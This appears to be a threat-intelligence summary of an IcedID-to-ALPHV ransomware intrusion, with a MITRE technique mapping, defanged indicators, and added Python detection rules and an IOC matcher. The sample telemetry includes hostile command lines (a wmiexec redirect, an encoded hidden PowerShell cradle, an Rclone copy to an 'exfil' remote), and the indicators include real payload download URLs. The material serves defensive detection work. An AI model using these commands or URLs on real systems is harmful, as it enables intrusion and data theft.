IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

An October 2023 intrusion began with a spam campaign that delivered a forked IcedID loader. From the beachhead, the threat actor used Impacket's wmiexec and RDP to install ScreenConnect on multiple systems, then deployed Cobalt Strike beacons and the CSharp Streamer RAT from there. Data was staged with a custom tool and exfiltrated with Rclone, and the operation culminated with ALPHV ransomware on domain-joined Windows hosts. #IcedID #ScreenConnect #CobaltStrike #ALPHV #Rclone

Keypoints

  • The intrusion started in October 2023 with a spam email that enticed the recipient to download a zip archive containing a Visual Basic Script (VBS); the script dropped and executed a forked IcedID loader DLL.
  • Impacket wmiexec and RDP were used to install ScreenConnect on multiple systems, enabling command execution and Cobalt Strike beacon deployment.
  • CSharp Streamer was deployed as a multi-function RAT for credential access and C2 tasks, including LSASS access and a DCSync against a domain controller.
  • A custom tool (confucius_cpp) staged data and Rclone was used to exfiltrate data to a remote server.
  • In the final stage the threat actor deleted the backups and then deployed ALPHV ransomware to the domain controllers and other domain-joined hosts.
  • Throughout the attack, attackers moved laterally via RDP, performed discovery with built-in Windows tools, and attempted multiple payload delivery methods before encryption.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The intrusion began with a malicious email that enticed the recipient to download a zip archive containing a Visual Basic Script (VBS). “This intrusion began in October 2023 with a malicious email that enticed the recipient to download a zip archive containing a Visual Basic Script (VBS).”
  • [T1047] Windows Management Instrumentation – Impacket’s wmiexec (remote command execution over WMI) was used alongside RDP to install ScreenConnect on multiple systems. “They used Impacket’s wmiexec and RDP to install ScreenConnect on multiple systems, enabling them to execute various commands and deploy Cobalt Strike beacons.”
  • [T1219] Remote Access Software – ScreenConnect used to access and control compromised hosts. “The threat actor used ScreenConnect on the beachhead…”
  • [T1071.001] Application Layer Protocol: Web Protocols – Cobalt Strike beacons communicated with their C2 server over HTTP/S. “The beacons were dropped … and established communication with the Cobalt Strike command and control server.”
  • [T1003.001] LSASS Memory – Access to LSASS for credential dumping during the intrusion. “LSASS was accessed on the host for credential access.”
  • [T1003.006] DCSync – A dcsync operation was performed from the beachhead to a domain controller. “the threat actor performed a dcsync operation from the beachhead host to one of the domain controllers.”
  • [T1218.010] System Binary Proxy Execution: Regsvr32 – The DLL embedded in the VBS was written to the Windows Temp directory and executed via regsvr32 (the retired ID T1117 covers the same technique). “The DLL is saved in C:\Windows\Temp\370-1.dll and then executes said DLL through regsvr32.”
  • [T1569.002] System Services: Service Execution – ScreenConnect was installed as a Windows service and runs under it; the same auto-start service is what gives it persistence across reboots (Create or Modify System Process: Windows Service, T1543.003). “ScreenConnect persists across reboots with an auto-start service.”
  • [T1021.001] Remote Desktop – RDP was used extensively for lateral movement between domain controllers and file servers. “RDP was used extensively during the intrusion”
  • [T1059.001] PowerShell – PowerShell cradles were used to retrieve Cobalt Strike beacons, often via ScreenConnect. “PowerShell was another tool used to retrieve Cobalt Strike beacons, again with some failures, and yet again using ScreenConnect.”
  • [T1560.001] Archive via Utility – The confucius_cpp tool archives data before exfiltration. “we observed … creating multiple ZIP archives.”
  • [T1046] Network Service Discovery – SoftPerfect netscan and multiple built-in discovery commands were run to map the environment (the report names “SoftPerfect netscan” explicitly).
  • [T1083] File and Directory Discovery – Discovery of files and folders during exfiltration preparation. “on each selected folder, the tool will look for files based on keywords and then compress data.”
  • [T1486] Data Encrypted for Impact – In the final stage ALPHV ransomware encrypted files on the domain controllers and other domain-joined hosts.
  • [T1490] Inhibit System Recovery – Backups were deleted interactively before encryption so the victim could not restore from them. “the threat actor deleting all the backups interactively.”
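Detection logic for the behaviours mapped above, as an added example that is not part of the original report: it runs process-creation rules (Sysmon EventID 1 style) and a DCSync rule (Security 4662) over constructed records. The sample events, host names and allowlists are made up for illustration; the wmiexec output-redirection artifact and the two replication-right GUIDs are the documented values.

```python
import re

# Control access right GUIDs that DCSync needs; these are the documented
# Active Directory values for the two directory-replication rights.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Assumptions for this example: accounts that legitimately replicate, and
# hosts allowed to run a ScreenConnect client.
REPLICATION_ALLOWLIST = {"DC01$", "DC02$"}
SCREENCONNECT_ALLOWLIST = {"helpdesk01"}

POWERSHELL_CRADLE = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest"
    r"|\biwr\b|frombase64string|-e(nc|ncodedcommand)?\s)", re.I)


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_wmiexec(ev):
    r"""T1047: Impacket wmiexec runs 'cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<ts> 2>&1'
    under WmiPrvSE.exe; the ADMIN$\__ output redirect is the tell."""
    return (_base(ev["parent_image"]) == "wmiprvse.exe"
            and _base(ev["image"]) == "cmd.exe"
            and re.search(r"\\\\127\.0\.0\.1\\admin\$\\__", ev["command_line"], re.I) is not None)


def rule_regsvr32_temp_dll(ev):
    r"""T1218.010: regsvr32 loading a DLL staged under C:\Windows\Temp."""
    return (_base(ev["image"]) == "regsvr32.exe"
            and re.search(r"\\windows\\temp\\[^\s\"]+\.dll", ev["command_line"], re.I) is not None)


def rule_screenconnect(ev):
    """T1219: ScreenConnect client activity on a host where it is not sanctioned.
    The product name stays in the installed client's path even when the
    installer itself was renamed (toovey.exe in the report)."""
    return ("screenconnect" in ev["command_line"].lower()
            and ev["host"].lower() not in SCREENCONNECT_ALLOWLIST)


def rule_powershell_cradle(ev):
    """T1059.001: download or decode cradle of the kind used to pull a beacon."""
    return (_base(ev["image"]) in {"powershell.exe", "pwsh.exe"}
            and POWERSHELL_CRADLE.search(ev["command_line"]) is not None)


def rule_rclone(ev):
    r"""Rclone exfiltration: the binary name or, for a renamed copy, the
    'copy|sync|move <src> <remote>:<path>' argument shape. The remote name must
    be at least two characters so a plain 'copy a.txt d:\x' does not match."""
    return (_base(ev["image"]) == "rclone.exe"
            or re.search(r"\s(copy|sync|move)\s+\S+\s+[\w-]{2,}:\S*",
                         ev["command_line"], re.I) is not None)


def rule_dcsync(ev):
    """T1003.006: a 4662 granting a replication right to an account that is
    not a domain controller or a known replication service."""
    props = ev.get("properties", "").lower()
    return (any(g in props for g in REPL_RIGHTS)
            and ev["subject_user"] not in REPLICATION_ALLOWLIST)


PROCESS_RULES = [
    ("T1047 wmiexec", rule_wmiexec),
    ("T1218.010 regsvr32 temp dll", rule_regsvr32_temp_dll),
    ("T1219 screenconnect", rule_screenconnect),
    ("T1059.001 powershell cradle", rule_powershell_cradle),
    ("rclone exfil", rule_rclone),
]


def triage(events):
    """Return (host, rule) pairs for every rule that fires, in event order."""
    hits = []
    for ev in events:
        if ev["event_id"] == 1:
            hits += [(ev["host"], name) for name, rule in PROCESS_RULES if rule(ev)]
        elif ev["event_id"] == 4662 and rule_dcsync(ev):
            hits.append((ev["host"], "T1003.006 dcsync"))
    return hits


# Constructed sample telemetry; not records from the reported intrusion.
SAMPLE_EVENTS = [
    {"event_id": 1, "host": "WS01", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\Windows\Temp\370-1.dll"},
    {"event_id": 1, "host": "WS01", "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /Q /c C:\Users\Public\toovey.exe 1> \\127.0.0.1\ADMIN$\__1698000000.12 2>&1"},
    {"event_id": 1, "host": "FILESRV01", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (4f1b)\ScreenConnect.ClientService.exe",
     "command_line": r'"C:\Program Files (x86)\ScreenConnect Client (4f1b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest"'},
    {"event_id": 1, "host": "FILESRV01", "parent_image": r"C:\Program Files (x86)\ScreenConnect Client (4f1b)\ScreenConnect.WindowsClient.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"event_id": 1, "host": "FILESRV01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\rc.exe",
     "command_line": r"rc.exe copy C:\Users\Public\out exfil:share --transfers 10"},
    {"event_id": 1, "host": "WS02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ep bypass -File C:\scripts\inventory.ps1"},
    {"event_id": 4662, "host": "DC01", "subject_user": "jdoe",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"event_id": 4662, "host": "DC01", "subject_user": "DC02$",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for host, rule in triage(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The rclone rule is deliberately shape-based because the binary is trivially renamed; the DCSync rule depends on a 4662 audit policy (Directory Service Access) being enabled on the domain controllers, and the allowlist must be kept in step with whatever legitimately replicates (DC machine accounts, directory sync services).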

Indicators of Compromise

  • [IP] – Command-and-control infrastructure: 173.255.204[.]62, 94.232.46[.]27, 77.105.140[.]181.
  • [Domain] – Known C2/domains used for IcedID and Cobalt Strike activities: modalefastnow[.]com, jkbarmossen[.]com, evinakortu[.]com, hofsaalos[.]com, jerryposter[.]com, skrechelres[.]com.
  • [URL] – Payload download URLs observed: http[:]//85.209.11[.]48:80/download/test1.exe, http[:]//85.209.11[.]48:80/download/http64.exe, http[:]//85.209.11[.]48:80/download/csss.exe, http[:]//temp[.]sh/VSlAV/http64.exe.
  • [File] – Renamed installers and payloads: toovey.exe (renamed ScreenConnect installer), setup.exe, BNUfUOmFT2.exe (ALPHV), cslite.exe (CSharp Streamer), confucius_cpp.exe, rclone.exe, http64.dll (multiple variants).
  • [Port/IP] – Exfiltration over SSH: TCP port 22 to 217.23.12[.]8. “Exfiltration Server data: 217.23.12.8, Port 22.”
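A small matcher for the indicators above, added here as an example and not code from the original report: it refangs the defanged values, derives the host of each URL as an indicator of its own, and sweeps constructed DNS, proxy and flow log lines. The log format and host names are made up; the only real values are the indicators listed on this page. Public file hosting such as temp[.]sh is matched only as the full URL, since the host itself is shared infrastructure.

```python
import ipaddress
from urllib.parse import urlsplit

# Indicators as listed above, in their defanged form.
DEFANGED_IOCS = [
    "173.255.204[.]62", "94.232.46[.]27", "77.105.140[.]181", "217.23.12[.]8",
    "modalefastnow[.]com", "jkbarmossen[.]com", "evinakortu[.]com",
    "hofsaalos[.]com", "jerryposter[.]com", "skrechelres[.]com",
    "http[:]//85.209.11[.]48:80/download/test1.exe",
    "http[:]//85.209.11[.]48:80/download/http64.exe",
    "http[:]//85.209.11[.]48:80/download/csss.exe",
    "http[:]//temp[.]sh/VSlAV/http64.exe",
]
# Shared file-hosting services: match the full URL, never the bare host.
SHARED_HOSTS = {"temp.sh"}


def refang(ioc):
    """Undo the common defanging conventions ([.] [:] hxxp)."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http").strip()


def build_sets(iocs):
    """Split indicators into IP, domain and (host, path) sets. A URL also
    contributes its host as an IP or domain indicator unless it is shared."""
    ips, domains, urls = set(), set(), set()
    for raw in iocs:
        value = refang(raw)
        if "://" in value:
            u = urlsplit(value)
            urls.add((u.hostname, u.path))
            value = u.hostname
        try:
            ips.add(str(ipaddress.ip_address(value)))
        except ValueError:
            if value not in SHARED_HOSTS:
                domains.add(value.lower().rstrip("."))
    return ips, domains, urls


def match_line(line, ips, domains, urls):
    """Return (kind, indicator) pairs found in one whitespace-separated log
    line. host:port tokens are split on the last colon (IPv4 only)."""
    hits = []
    for tok in line.split():
        tok = tok.rstrip(",;")
        if "://" in tok:
            u = urlsplit(tok)
            if (u.hostname, u.path) in urls:
                hits.append(("url", tok))
            elif u.hostname in ips or u.hostname in domains:
                hits.append(("host", u.hostname))
            continue
        host = tok.lower().rsplit(":", 1)[0].rstrip(".")
        if host in ips:
            hits.append(("ip", host))
        elif host in domains:
            hits.append(("domain", host))
    return hits


def scan(lines, iocs=DEFANGED_IOCS):
    """(line number, kind, indicator) for every match across the lines."""
    ips, domains, urls = build_sets(iocs)
    return [(n, kind, val) for n, line in enumerate(lines, 1)
            for kind, val in match_line(line, ips, domains, urls)]


# Constructed log lines in a simple '<timestamp> <host> <source> ...' shape.
SAMPLE_LOG = """\
2023-10-11T09:12:44Z WS01 dns query A jkbarmossen.com
2023-10-11T09:12:45Z WS01 dns query A evinakortu.com.
2023-10-11T09:30:01Z WS01 proxy GET http://85.209.11.48:80/download/http64.exe 200
2023-10-12T14:02:13Z FILESRV01 proxy GET http://temp.sh/VSlAV/http64.exe 200
2023-10-12T14:05:00Z WS02 proxy GET http://temp.sh/abcde/invoice.pdf 200
2023-10-14T02:10:05Z FILESRV01 flow 10.0.0.5:51234 -> 217.23.12.8:22 tcp 8123456789
2023-10-14T02:11:00Z WS02 flow 10.0.0.7:52000 -> 93.184.216.34:443 tcp 4096
""".splitlines()

if __name__ == "__main__":
    for n, kind, val in scan(SAMPLE_LOG):
        print(f"line {n}: {kind} {val}")
```

Line 5 is the reason for the shared-host rule: an unrelated download from the same file-hosting service must not fire on the bare domain, while the exact payload URL on line 4 still does. The flow on line 6 is flagged by destination IP alone; on a real SIEM you would also key on the port 22 destination and the byte count to separate exfiltration from any legitimate SSH.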

Read more: https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/